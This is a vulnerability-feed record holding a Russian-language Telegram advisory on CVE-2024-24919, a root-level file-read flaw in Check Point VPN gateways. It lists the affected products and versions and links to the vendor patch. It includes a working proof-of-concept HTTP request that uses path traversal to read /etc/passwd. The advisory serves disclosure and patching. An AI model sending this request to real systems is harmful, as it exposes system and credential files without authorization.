{"uuid": "d9aaf193-64a9-4760-b619-94f21671ab22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/poxek/4112", "content": "\u041f\u0440\u0438\u0432\u0435\u0442, \u0434\u0440\u0443\u0437\u044c\u044f! \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u0443 \u043d\u0430\u0441 \u043d\u0430 \u043f\u043e\u0432\u0435\u0441\u0442\u043a\u0435 \u0434\u043d\u044f CVE-2024-24919. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Check Point Remote Access VPN \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u043d\u0430 \u0445\u043e\u0441\u0442\u0435 (LFI), \u043f\u0440\u0438\u0447\u0435\u043c \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root. \u0423\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b:\n\n  - CloudGuard Network\n  - Quantum Maestro\n  - Quantum Scalable Chassis\n  - Quantum Security Gateways\n  - Quantum Spark Appliances\n\n- \u0412\u0435\u0440\u0441\u0438\u0438:\n  - R77.20 (EOL)\n  - R77.30 (EOL)\n  - R80.10 (EOL)\n  - R80.20 (EOL)\n  - R80.20.x\n  - R80.20SP (EOL)\n  - R80.30 (EOL)\n  - R80.30SP (EOL)\n  - R80.40 (EOL)\n  - R81\n  - R81.10\n  - R81.10.x\n  - R81.20\n\nPOC\n\nPOST /clients/MyCRL HTTP/1.1 \nHost: target_host \nContent-Length: 63 \n \naCSHELL/../../../../../../../etc/passwd\n\n\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0441\u0440\u043e\u0447\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f: https://support.checkpoint.com/results/sk/sk182336\n\n#cve", "creation_timestamp": "2024-05-30T15:00:26.000000Z"}